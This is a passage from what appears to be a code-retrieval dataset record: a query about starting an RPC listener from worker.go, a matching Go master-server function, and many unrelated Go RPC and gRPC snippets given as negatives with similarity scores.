\"initialized\":\n\t\t// Not doing anything here. Unsure right now what this is really for.\n\t\treturn nil, nil\n\tcase \"shutdown\":\n\t\treturn nil, nil\n\tcase \"exit\":\n\t\t// exit is a request to terminate the process. We do this preferably by shutting\n\t\t// down the RPC connection but if we can't we just die.\n\t\tif h.Conn != nil {\n\t\t\tif err := h.Conn.Close(); err != nil {\n\t\t\t\tlog.Fatalf(\"Failed to close connection: %s\", err)\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Fatalf(\"No active connection to shut down\")\n\t\t}\n\t\treturn nil, nil\n\tcase \"textDocument/didOpen\":\n\t\tdidOpenParams := &lsp.DidOpenTextDocumentParams{}\n\t\tif err := json.Unmarshal(*params, didOpenParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn nil, h.didOpen(didOpenParams)\n\tcase \"textDocument/didChange\":\n\t\tdidChangeParams := &lsp.DidChangeTextDocumentParams{}\n\t\tif err := json.Unmarshal(*params, didChangeParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn nil, h.didChange(didChangeParams)\n\tcase \"textDocument/didSave\":\n\t\tdidSaveParams := &lsp.DidSaveTextDocumentParams{}\n\t\tif err := json.Unmarshal(*params, didSaveParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn nil, h.didSave(didSaveParams)\n\tcase \"textDocument/didClose\":\n\t\tdidCloseParams := &lsp.DidCloseTextDocumentParams{}\n\t\tif err := json.Unmarshal(*params, didCloseParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn nil, h.didClose(didCloseParams)\n\tcase \"textDocument/formatting\":\n\t\tformattingParams := &lsp.DocumentFormattingParams{}\n\t\tif err := json.Unmarshal(*params, formattingParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.formatting(formattingParams)\n\tcase \"textDocument/completion\":\n\t\tcompletionParams := &lsp.CompletionParams{}\n\t\tif err := json.Unmarshal(*params, completionParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.completion(completionParams)\n\tcase \"textDocument/documentSymbol\":\n\t\tsymbolParams := &lsp.DocumentSymbolParams{}\n\t\tif err := json.Unmarshal(*params, symbolParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.symbols(symbolParams)\n\tcase \"textDocument/declaration\":\n\t\tfallthrough\n\tcase \"textDocument/definition\":\n\t\tpositionParams := &lsp.TextDocumentPositionParams{}\n\t\tif err := json.Unmarshal(*params, positionParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.definition(positionParams)\n\tdefault:\n\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeMethodNotFound}\n\t}\n}", "func (s *UserClient) RpcInvoke(req []byte) ([]byte, error) {\n\t// rpc.send\n\terr := s.rpc.Send(req)\n\tif nil != err {\n\t\treturn nil, err\n\t}\n\n\t// rpc.receive\n\treturn s.rpc.Receive()\n}", "func call(rpcname string, args interface{}, reply interface{}) bool {\n\t// c, err := rpc.DialHTTP(\"tcp\", \"127.0.0.1\"+\":1234\")\n\tc, err := rpc.DialHTTP(\"unix\", \"mr-socket\")\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\n\terr = c.Call(rpcname, args, reply)\n\tif err == nil {\n\t\treturn true\n\t}\n\n\tfmt.Println(err)\n\treturn false\n}", "func worker_pool() {\n\n}", "func (c *etcdClient) worker(m plugin.MetricType) error {\n\t_, err := c.keysAPI.Set(context.Background(), fmt.Sprintf(\"%v/%v\", m.Namespace(), m.Timestamp().UTC().UnixNano()), fmt.Sprintf(\"%v\", m.Data()), nil)\n\treturn err\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\tfor true {\n\t\treply := caller(requestJob)\n\t\tjobType := reply.JobType\n\t\tswitch jobType {\n\t\tcase (mapJob):\n\t\t\tmapCall(&reply, mapf)\n\t\tcase (noJob):\n\t\t\tfmt.Println(\"No task recieved\")\n\t\t\ttime.Sleep(time.Millisecond * 50)\n\t\tcase (finishAllJobs):\n\t\t\treturn\n\t\t}\n\t}\n}", "func call(rpcname string, args interface{}, reply interface{}) bool {\n\tc, err := rpc.DialHTTP(\"tcp\", \"127.0.0.1\"+\":1234\")\n\t// sockname := masterSock()\n\t// c, err := rpc.DialHTTP(\"unix\", sockname)\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\n\terr = c.Call(rpcname, args, reply)\n\tif err == nil {\n\t\treturn true\n\t}\n\n\tlog.Println(err)\n\treturn false\n}", "func handlerRunner(msgHandler *mtypeInfo, conn net.Conn, data []byte) {\n\tstart := time.Now()\n\t// Run the handler for this message type.\n\tmsgHandler.handler(conn, data)\n\t// Update statistics for this message type.\n\tmsgHandler.statsLock.Lock()\n\tmsgHandler.stats.TotRuntime += time.Since(start)\n\tmsgHandler.stats.NrCalls += 1\n\tmsgHandler.stats.AveRuntime = msgHandler.stats.TotRuntime / time.Duration(msgHandler.stats.NrCalls)\n\tmsgHandler.statsLock.Unlock()\n}", "func call(rpcname string, args interface{}, reply interface{}) bool {\n\t// c, err := rpc.DialHTTP(\"tcp\", \"127.0.0.1\"+\":1234\")\n\tc, err := rpc.DialHTTP(\"unix\", \"mr-socket\")\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\n\terr = c.Call(rpcname, args, reply)\n\tif err == nil {\n\t\treturn true\n\t}\n\n\tlog.Fatal(err)\n\treturn false\n}", "func main() {\n\tadder := &Adder{0}\n\n\t// Reset the counter every 30 seconds\n\tgo func() {\n\t\tc := time.Tick(30 * time.Second)\n\t\tfor _ = range c {\n\t\t\tadder.Reset()\n\t\t}\n\t}()\n\n\t// register our adder (adds the exposed methods)\n\t// set the http server to use /rpc as the websocket endpoint\n\trpc.Register(adder)\n\thttp.Handle(\"/rpc\", websocket.Handler(func(ws *websocket.Conn) {\n\t\tjsonrpc.ServeConn(ws)\n\t}))\n\n\t// Serve static files\n\thttp.Handle(\"/\", http.FileServer(http.Dir(\".\")))\n\terr := http.ListenAndServe(\":12345\", nil)\n\tif err != nil {\n\t\tpanic(\"ListenAndServe: \" + err.Error())\n\t}\n}", "func main() {\n\tlog.Printf(\"grpc-ping: starting server...\")\n\n\t//Get env vars\n\t//Can be passed in at command line PORT=9090 or in code\n\tport := os.Getenv(\"PORT\")\n\t//if no port set to 8080\n\tif port == \"\" {\n\t\tport = \"8080\"\n\t\tlog.Printf(\"Defaulting to port %s\", port)\n\t}\n\n\t//Creates a TCP listener on port you want\n\t//gRPC uses HTTP/2, which multiplexes multiple calls on a single TCP connection. All gRPC calls over that connection go to one endpoint\n\tlistener, err := net.Listen(\"tcp\", \":\"+port)\n\tif err != nil {\n\t\tlog.Fatalf(\"net.Listen: %v\", err)\n\t}\n\n\n\t//creates a new gRPC server with a server service which can be called via an API\n\t//attach the Ping service to the server\n\t//Remember server implements service interface to create API that can be called - PingServiceServer interface\n\t//RegisterService registers a service and its implementation to the gRPC server. - Server API ready for calls\n\tgrpcServer := grpc.NewServer()\n\tpb.RegisterPingServiceServer(grpcServer, &pingService{})\n\tif err = grpcServer.Serve(listener); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func main() {\n\t// Listen an actual port.\n\tlis, err := net.Listen(\"tcp\", fmt.Sprintf(\":%d\", 9093))\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\tdefer lis.Close()\n\n\t// Create a HTTP server for prometheus.\n\thttpServer := &http.Server{Handler: promhttp.HandlerFor(reg, promhttp.HandlerOpts{}), Addr: fmt.Sprintf(\"0.0.0.0:%d\", 9092)}\n\n\t// Create a gRPC Server with gRPC interceptor.\n\tgrpcServer := grpc.NewServer(\n\t\tgrpc.StreamInterceptor(grpcMetrics.StreamServerInterceptor()),\n\t\tgrpc.UnaryInterceptor(grpcMetrics.UnaryServerInterceptor()),\n\t)\n\n\t// Create a new api server.\n\tdemoServer := newDemoServer()\n\n\t// Register your service.\n\tpb.RegisterDemoServiceServer(grpcServer, demoServer)\n\n\t// Initialize all metrics.\n\tgrpcMetrics.InitializeMetrics(grpcServer)\n\n\t// Start your http server for prometheus.\n\tgo func() {\n\t\tif err := httpServer.ListenAndServe(); err != nil {\n\t\t\tlog.Fatal(\"Unable to start a http server.\")\n\t\t}\n\t}()\n\n\t// Start your gRPC server.\n\tlog.Fatal(grpcServer.Serve(lis))\n}", "func main() {\n\thandler := pb.NewHelloWorldServer(&HelloWorldServer{}, nil)\n\t// You can use any mux you like - NewHelloWorldServer gives you an http.Handler.\n\tmux := http.NewServeMux()\n\t// The generated code includes a const, <ServiceName>PathPrefix, which\n\t// can be used to mount your service on a mux.\n\tmux.Handle(pb.HelloWorldPathPrefix, handler)\n\thttp.ListenAndServe(\":8080\", mux)\n}", "func (d *Data) DoRPC(req datastore.Request, reply *datastore.Response) error {\n\tswitch req.TypeCommand() {\n\tcase \"set-nextlabel\":\n\t\tif len(req.Command) < 5 {\n\t\t\treturn fmt.Errorf(\"poorly formatted set-nextlabel command, see command-line help\")\n\t\t}\n\n\t\t// Parse the request\n\t\tvar uuidStr, dataName, cmdStr, labelStr string\n\t\treq.CommandArgs(1, &uuidStr, &dataName, &cmdStr, &labelStr)\n\n\t\tuuid, _, err := datastore.MatchingUUID(uuidStr)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tdataservice, err := datastore.GetDataByUUIDName(uuid, dvid.InstanceName(dataName))\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tlmData, ok := dataservice.(*Data)\n\t\tif !ok {\n\t\t\treturn fmt.Errorf(\"instance %q of uuid %s was not a labelmap instance\", dataName, uuid)\n\t\t}\n\n\t\tnextLabelID, err := strconv.ParseUint(labelStr, 10, 64)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif err := lmData.SetNextLabelStart(nextLabelID); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\treply.Text = fmt.Sprintf(\"Set next label ID to %d.\\n\", nextLabelID)\n\t\treturn nil\n\n\tcase \"load\":\n\t\tif len(req.Command) < 5 {\n\t\t\treturn fmt.Errorf(\"poorly formatted load command, see command-line help\")\n\t\t}\n\t\t// Parse the request\n\t\tvar uuidStr, dataName, cmdStr, offsetStr string\n\t\tfilenames, err := req.FilenameArgs(1, &uuidStr, &dataName, &cmdStr, &offsetStr)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif len(filenames) == 0 {\n\t\t\treturn fmt.Errorf(\"need to include at least one file to add: %s\", req)\n\t\t}\n\n\t\toffset, err := dvid.StringToPoint(offsetStr, \",\")\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"illegal offset specification: %s: %v\", offsetStr, err)\n\t\t}\n\n\t\tvar addedFiles string\n\t\tif len(filenames) == 1 {\n\t\t\taddedFiles = filenames[0]\n\t\t} else {\n\t\t\taddedFiles = fmt.Sprintf(\"filenames: %s [%d more]\", filenames[0], len(filenames)-1)\n\t\t}\n\t\tdvid.Debugf(addedFiles + \"\\n\")\n\n\t\tuuid, versionID, err := datastore.MatchingUUID(uuidStr)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err = datastore.AddToNodeLog(uuid, []string{req.Command.String()}); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tgo func() {\n\t\t\tif err = d.LoadImages(versionID, offset, filenames); err != nil {\n\t\t\t\tdvid.Errorf(\"Cannot load images into data instance %q @ node %s: %v\\n\", dataName, uuidStr, err)\n\t\t\t}\n\t\t\tif err := datastore.SaveDataByUUID(uuid, d); err != nil {\n\t\t\t\tdvid.Errorf(\"Could not store metadata changes into data instance %q @ node %s: %v\\n\", dataName, uuidStr, err)\n\t\t\t}\n\t\t}()\n\t\treply.Text = fmt.Sprintf(\"Asynchronously loading %d files into data instance %q @ node %s (errors will be printed in server log) ...\\n\", len(filenames), dataName, uuidStr)\n\t\treturn nil\n\n\tcase \"composite\":\n\t\tif len(req.Command) < 6 {\n\t\t\treturn fmt.Errorf(\"poorly formatted composite command. See command-line help\")\n\t\t}\n\t\treturn d.createComposite(req, reply)\n\n\tcase \"dump\":\n\t\tif len(req.Command) < 6 {\n\t\t\treturn fmt.Errorf(\"poorly formatted dump command. See command-line help\")\n\t\t}\n\t\t// Parse the request\n\t\tvar uuidStr, dataName, cmdStr, dumpType, outPath string\n\t\treq.CommandArgs(1, &uuidStr, &dataName, &cmdStr, &dumpType, &outPath)\n\n\t\tuuid, v, err := datastore.MatchingUUID(uuidStr)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// Setup output file\n\t\tf, err := os.OpenFile(outPath, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0755)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tswitch dumpType {\n\t\tcase \"svcount\":\n\t\t\tgo d.writeSVCounts(f, outPath, v)\n\t\t\treply.Text = fmt.Sprintf(\"Asynchronously writing supervoxel counts for data %q, uuid %s to file: %s\\n\", d.DataName(), uuid, outPath)\n\t\tcase \"mappings\":\n\t\t\tgo d.writeFileMappings(f, outPath, v)\n\t\t\treply.Text = fmt.Sprintf(\"Asynchronously writing mappings for data %q, uuid %s to file: %s\\n\", d.DataName(), uuid, outPath)\n\t\tcase \"indices\":\n\t\t\tgo d.writeIndices(f, outPath, v)\n\t\t\treply.Text = fmt.Sprintf(\"Asynchronously writing label indices for data %q, uuid %s to file: %s\\n\", d.DataName(), uuid, outPath)\n\t\tdefault:\n\t\t}\n\t\treturn nil\n\n\tdefault:\n\t\treturn fmt.Errorf(\"unknown command. Data type '%s' [%s] does not support '%s' command\",\n\t\t\td.DataName(), d.TypeName(), req.TypeCommand())\n\t}\n}", "func (server *Server) callRPCAndFormatReply(buf []byte, ci *clientInfo, jReq *jsonRequest) (ior *ioReply) {\n\tvar (\n\t\terr error\n\t\treturnValues []reflect.Value\n\t\ttypOfReq reflect.Type\n\t\tdummyReq interface{}\n\t)\n\n\t// Setup the reply structure with common fields\n\tior = &ioReply{}\n\trid := jReq.RequestID\n\tjReply := &jsonReply{MyUniqueID: jReq.MyUniqueID, RequestID: rid}\n\n\tma := server.svrMap[jReq.Method]\n\tif ma != nil {\n\n\t\t// Another unmarshal of buf to find the parameters specific to\n\t\t// this RPC\n\t\ttypOfReq = ma.request.Elem()\n\t\tdummyReq = reflect.New(typOfReq).Interface()\n\n\t\tsReq := svrRequest{}\n\t\tsReq.Params[0] = dummyReq\n\t\terr = json.Unmarshal(buf, &sReq)\n\t\tif err != nil {\n\t\t\tserver.logger.Fatalf(\"Unmarshal sReq: %+v err: %v\", sReq, err)\n\t\t\treturn\n\t\t}\n\t\treq := reflect.ValueOf(dummyReq)\n\t\tcid := reflect.ValueOf(ci.myUniqueID)\n\n\t\t// Create the reply structure\n\t\ttypOfReply := ma.reply.Elem()\n\t\tmyReply := reflect.New(typOfReply)\n\n\t\t// Call the method\n\t\tfunction := ma.methodPtr.Func\n\t\tt := time.Now()\n\t\tif ma.passClientID {\n\t\t\treturnValues = function.Call([]reflect.Value{server.receiver, cid, req, myReply})\n\t\t} else {\n\t\t\treturnValues = function.Call([]reflect.Value{server.receiver, req, myReply})\n\t\t}\n\t\tci.setMethodStats(jReq.Method, uint64(time.Since(t).Microseconds()))\n\n\t\t// The return value for the method is an error.\n\t\terrInter := returnValues[0].Interface()\n\t\tif errInter == nil {\n\t\t\tjReply.Result = myReply.Elem().Interface()\n\t\t} else {\n\t\t\te, ok := errInter.(error)\n\t\t\tif !ok {\n\t\t\t\tserver.logger.Fatalf(\"Call returnValues invalid cast errInter: %+v\", errInter)\n\t\t\t}\n\t\t\tjReply.ErrStr = e.Error()\n\t\t}\n\t} else {\n\t\t// TODO - figure out if this is the correct error\n\n\t\t// Method does not exist\n\t\tjReply.ErrStr = fmt.Sprintf(\"errno: %d\", unix.ENOENT)\n\t}\n\n\t// Convert response into JSON for return trip\n\tior.JResult, err = json.Marshal(jReply)\n\tif err != nil {\n\t\tserver.logger.Fatalf(\"Unable to marshal jReply: %+v err: %v\", jReply, err)\n\t}\n\n\treturn\n}", "func (m Manager)alluxioWorkerHandle (workerCtx *WorkerContext) {\n\tlogger := workerCtx.logger\n\n\tvar rsp AlluxioWebResponse\n\tbaseResp := BaseResponse {\n\t\tErrCode: ErrCodeOk,\n\t\tErrInfo: ErrInfoOk,\n\t\tMoreInfo: \"\",\n\t}\n\n\twebRequst := workerCtx.workerRequest.Body.(AlluxioWebRequest)\n\tfileID := \"\"\n\n\tswitch workerCtx.workerRequest.Type {\n\tcase RequestAlluxioCreateUser :\n\t\tlogger.Infof(\"Guid:%s, begin to handle create usr info\", workerCtx.workerRequest.GUID)\n\n\t\terr := m.alluxioCreateUser(workerCtx)\n\n\t\tif err != nil {\n\t\t\tbaseResp.ErrCode = ErrCodeAllocateResFail\n\t\t\tbaseResp.ErrInfo = ErrInfoAllocateResFail\n\t\t\tbaseResp.MoreInfo = fmt.Sprintf(\"Err: %s\", err)\n\t\t}\n\n\tcase RequestAlluxioDeleteUser :\n\t\tlogger.Infof(\"Guid:%s, begin to handle create usr info\", workerCtx.workerRequest.GUID)\n\n\t\terr := m.alluxioDeleteUser(workerCtx)\n\n\t\tif err != nil {\n\t\t\tbaseResp.ErrCode = ErrCodeDeleteResFail\n\t\t\tbaseResp.ErrInfo = ErrInfoDeleteResFail\n\t\t\tbaseResp.MoreInfo = fmt.Sprintf(\"Err: %s\", err)\n\t\t}\n\n\tcase RequestAlluxioDeleteFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle delete file\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioDeleteFile(workerCtx)\n\n\n\tcase RequestAlluxioRenameFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle rename file\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioRenameFile(workerCtx)\n\tcase RequestAlluxioUploadFile:\n\t\tlogger.Infof(\"Guid:%s, begin to handle upload file\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioUploadFile(workerCtx)\n\tcase RequestAlluxioReadFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle read file\", workerCtx.workerRequest.GUID)\n\t\tm.alluxioReadFile(workerCtx)\n\n\t/*****************following cases were not used*********************/\n\n\tcase RequestAlluxioOpenFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle open file\", workerCtx.workerRequest.GUID)\n\n\t\tfileID, baseResp = m.alluxioOpenFile(workerCtx)\n\n\tcase RequestAlluxioReadContent :\n\t\tlogger.Infof(\"Guid:%s, begin to handle read content\", workerCtx.workerRequest.GUID)\n\n\t\t//body, baseResp = m.alluxioReadContent(workerCtx)\n\n\tcase RequestAlluxioCreateFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle create file\", workerCtx.workerRequest.GUID)\n\n\t\tfileID, baseResp = m.alluxioCreateFile(workerCtx)\n\n\tcase RequestAlluxioWriteContent :\n\t\tlogger.Infof(\"Guid:%s, begin to handle write content\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioWriteContent(workerCtx)\n\n\tcase RequestAlluxioCloseFile :\n\t\tlogger.Infof(\"Guid:%s, begin to handle close file\", workerCtx.workerRequest.GUID)\n\n\t\tbaseResp = m.alluxioCloseFile(workerCtx)\n\n\tdefault:\n\t\tbaseResp.ErrCode = ErrCodeGeneral\n\t\tbaseResp.ErrInfo = \"the Method is not matched\"\n\t}\n\n\trsp = AlluxioWebResponse {\n\t\tBaseResponse: baseResp,\n\t\tGUID : webRequst.GUID,\n\t\tFileID: fileID,\n\t}\n\n\tm.workerSendRsp(workerCtx, rsp)\n}", "func main() {\n\n\tlis ,err := net.Listen(\"tcp\",fmt.Sprintf(\":%d\", 1368))\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tserver := grpc.NewServer()\n\trpc.RegisterUserServiceServer(server, &service.UserService{})\n\n\terr = server.Serve(lis)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func (c *app) handle(msg message) {\n\tswitch msg := msg.(type) {\n\n\tcase *challenge:\n\t\tgo c.handleChallenge(msg)\n\t\treturn\n\n\tcase *event:\n\t\tfor _, x := range c.domains {\n\t\t\tx.subLock.RLock()\n\t\t\tif binding, ok := x.subscriptions[msg.Subscription]; ok {\n\t\t\t\tx.subLock.RUnlock()\n\t\t\t\tDebug(\"Event %s (%d)\", binding.endpoint, binding.callback)\n\t\t\t\tgo x.handlePublish(msg, binding)\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\tx.subLock.RUnlock()\n\t\t\t}\n\t\t}\n\n\t\t// We can't be delivered to a sub we don't have... right?\n\t\tWarn(\"No handler registered for subscription:\", msg.Subscription)\n\n\tcase *invocation:\n\t\tfor _, x := range c.domains {\n\t\t\tx.regLock.RLock()\n\t\t\tif binding, ok := x.registrations[msg.Registration]; ok {\n\t\t\t\tx.regLock.RUnlock()\n\t\t\t\tDebug(\"Invoking %s (%d)\", binding.endpoint, binding.callback)\n\t\t\t\tgo x.handleInvocation(msg, binding)\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\tx.regLock.RUnlock()\n\t\t\t}\n\t\t}\n\n\t\ts := fmt.Sprintf(\"no handler for registration: %v\", msg.Registration)\n\t\tWarn(s)\n\n\t\tm := &errorMessage{\n\t\t\tType: iNVOCATION,\n\t\t\tRequest: msg.Request,\n\t\t\tDetails: make(map[string]interface{}),\n\t\t\tError: ErrNoSuchRegistration,\n\t\t}\n\n\t\tc.Queue(m)\n\n\t// Handle call results seperately to account for progressive calls\n\tcase *result:\n\t\t// If this is a progress call call the handler, do not alert the listener\n\t\t// Listener is only updated once the call completes\n\t\tif p, ok := msg.Details[\"progress\"]; ok {\n\t\t\tx := p.(bool)\n\t\t\tif x {\n\t\t\t\tfor _, x := range c.domains {\n\t\t\t\t\tif binding, ok := x.handlers[msg.Request]; ok {\n\t\t\t\t\t\tDebug(\"Result %s (%d)\", binding.endpoint, binding.callback)\n\t\t\t\t\t\tgo x.handleResult(msg, binding)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tc.findListener(msg)\n\t\t}\n\n\tcase *welcome:\n\t\tDebug(\"Received WELCOME, reestablishing state with the fabric\")\n\t\tc.open = true\n\t\tc.SetState(Ready)\n\n\t\t// Reset retry delay after successful connection.\n\t\tc.retryDelay = initialRetryDelay\n\n\t\tgo c.replayRegistrations()\n\t\tgo c.replaySubscriptions()\n\n\tcase *goodbye:\n\t\tc.Connection.Close(\"Fabric said goodbye. Closing connection\")\n\n\tdefault:\n\t\tc.findListener(msg)\n\t}\n}", "func (w *workerData) process(task *taskRequest) error {\n\tvar err error\n\treply := taskReply{}\n\n\tswitch task.action {\n\tcase actionAdd:\n\t\terr = w.actionAdd(task, &reply)\n\n\tcase actionBind:\n\t\terr = w.actionBind(task, &reply)\n\n\tcase actionDelete:\n\t\terr = w.actionDelete(task, &reply)\n\n\tcase actionMod:\n\t\terr = w.actionMod(task, &reply)\n\n\tcase actionModDn:\n\t\terr = w.actionModDN(task, &reply)\n\n\tcase actionSearch:\n\t\terr = w.actionSearch(task, &reply)\n\n\tdefault:\n\t\treply.err = errors.New(\"unsupported request\")\n\t\terr = errors.New(\"unsupported request\")\n\t}\n\n\ttask.reply <- reply\n\treturn err\n}" ]
[ "0.7302178", "0.6500732", "0.64542025", "0.6361744", "0.6355909", "0.63264745", "0.6268335", "0.62581736", "0.61935055", "0.61914307", "0.61727107", "0.6134238", "0.6127644", "0.6121213", "0.610963", "0.61064565", "0.60991734", "0.60874856", "0.60695577", "0.60539484", "0.60217106", "0.5999259", "0.5986379", "0.59583366", "0.5953211", "0.5947238", "0.5930659", "0.5918826", "0.58952415", "0.5891006", "0.5883653", "0.588135", "0.5876533", "0.58546466", "0.58493775", "0.5839862", "0.58314615", "0.58302116", "0.58287615", "0.58284926", "0.5820443", "0.5820096", "0.5815518", "0.5805758", "0.57969314", "0.5793354", "0.57677984", "0.57650965", "0.5761155", "0.57591665", "0.5756152", "0.5742761", "0.5735412", "0.5725017", "0.5724685", "0.5719632", "0.57141703", "0.57011825", "0.5698411", "0.56978685", "0.56978184", "0.5687989", "0.56799376", "0.5675122", "0.56647414", "0.56644565", "0.56544775", "0.56534743", "0.5638783", "0.56172514", "0.5613692", "0.56136394", "0.5570269", "0.556873", "0.5567898", "0.5564783", "0.55635035", "0.55562735", "0.5555568", "0.5543947", "0.55427724", "0.5537878", "0.55373967", "0.553364", "0.5532814", "0.5527962", "0.5522128", "0.55098987", "0.5507804", "0.5506672", "0.5505877", "0.5503393", "0.5492952", "0.5490167", "0.5488708", "0.5487205", "0.5476307", "0.5476219", "0.5474052", "0.5464918", "0.54627025" ]
0.0
-1
start a thread that listens for RPCs from worker.go
func (m *Master) server() { rpc.Register(m) rpc.HandleHTTP() //l, e := net.Listen("tcp", ":1234") sockname := masterSock() os.Remove(sockname) l, e := net.Listen("unix", sockname) if e != nil { log.Fatal("listen error:", e) } go http.Serve(l, nil) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (wk *Worker) startRPCServer() {\n\t// TODO: implement me\n\t// Hint: Refer to how the driver's startRPCServer is implemented.\n\t// TODO TODO TODO\n\t//\n\n\t//\n\t// Once shutdown is closed, should the following statement be\n\t// called, meaning the worker RPC server is existing.\n\tserverless.Debug(\"Worker: %v RPC server exist\\n\", wk.address)\n}", "func listenRPC(app *core.App, config standaloneConfig) error {\n\t// Initialize the JSON RPC WebSocket server (but don't start it yet).\n\trpcAddr := fmt.Sprintf(\":%d\", config.RPCPort)\n\trpcHandler := &rpcHandler{\n\t\tapp: app,\n\t}\n\trpcServer, err := rpc.NewServer(rpcAddr, rpcHandler)\n\tif err != nil {\n\t\treturn nil\n\t}\n\tgo func() {\n\t\t// Wait for the server to start listening and select an address.\n\t\tfor rpcServer.Addr() == nil {\n\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t}\n\t\tlog.WithField(\"address\", rpcServer.Addr().String()).Info(\"started RPC server\")\n\t}()\n\treturn rpcServer.Listen()\n}", "func startServer(wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\n\tlistener, err := net.Listen(\"tcp\", fmt.Sprintf(\"%s:%d\", MyHandle.Host, MyHandle.Port))\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to startServer: %v\", err)\n\t}\n\n\tgrpcServer := grpc.NewServer()\n\tapi.RegisterGoChatServer(grpcServer, &chatServer{})\n\n\terr = grpcServer.Serve(listener)\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to serve: %v\", err)\n\t}\n}", "func (s *Server) RunRPC(ctx context.Context, wg *sync.WaitGroup) error {\n\twg.Add(1)\n\n\tl, err := net.Listen(\"tcp\", s.GRPCListen)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tsrvr := grpc.NewServer()\n\tpb.RegisterRegistryServer(srvr, s)\n\n\t// Shutdown procedure.\n\tgo func() {\n\t\t<-ctx.Done()\n\t\tlog.Println(\"Shutting down gRPC listener\")\n\n\t\tsrvr.GracefulStop()\n\n\t\tif err := l.Close(); err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\twg.Done()\n\t}()\n\n\t// Background the listener.\n\tgo func() {\n\t\tlog.Printf(\"gRPC up: %s\\n\", s.GRPCListen)\n\t\tif err := srvr.Serve(l); err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t}()\n\n\treturn nil\n}", "func (r *runtime) startGRPCServer() {\n\tr.logger.Info(\"starting GRPC server\")\n\tr.grpcServer = newGRPCServer(r.config.BrokerBase.GRPC, linmetric.BrokerRegistry)\n\n\t// bind grpc handlers\n\tr.rpcHandler = &rpcHandler{\n\t\thandler: query.NewTaskHandler(\n\t\t\tr.config.Query,\n\t\t\tr.factory.taskServer,\n\t\t\tquery.NewIntermediateTaskProcessor(*r.node, r.config.Query.Timeout.Duration(),\n\t\t\t\tr.stateMgr, r.srv.taskManager, r.srv.transportManager),\n\t\t\tr.queryPool,\n\t\t),\n\t}\n\n\tprotoCommonV1.RegisterTaskServiceServer(r.grpcServer.GetServer(), r.rpcHandler.handler)\n\n\tgo serveGRPCFn(r.grpcServer)\n}", "func run() error {\n\tlistenOn := \"127.0.0.1:8080\"\n\tlistener, err := net.Listen(\"tcp\", listenOn)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to listen on %s: %w\", listenOn, err)\n\t}\n\n\tserver := grpc.NewServer()\n\tuserv1.RegisterUserServiceServer(server, &userServiceServer{})\n\tlog.Println(\"Listening on\", listenOn)\n\n\tif err := server.Serve(listener); err != nil {\n\t\treturn fmt.Errorf(\"failed to serve gRPC server: %w\", err)\n\t}\n\n\treturn nil\n}", "func startServer(t testing.TB, h jsonrpc2.Handler) net.Listener {\n\tlistener, err := net.Listen(\"tcp\", bindAddr)\n\tif err != nil {\n\t\tt.Fatal(\"Listen:\", err)\n\t}\n\tgo func() 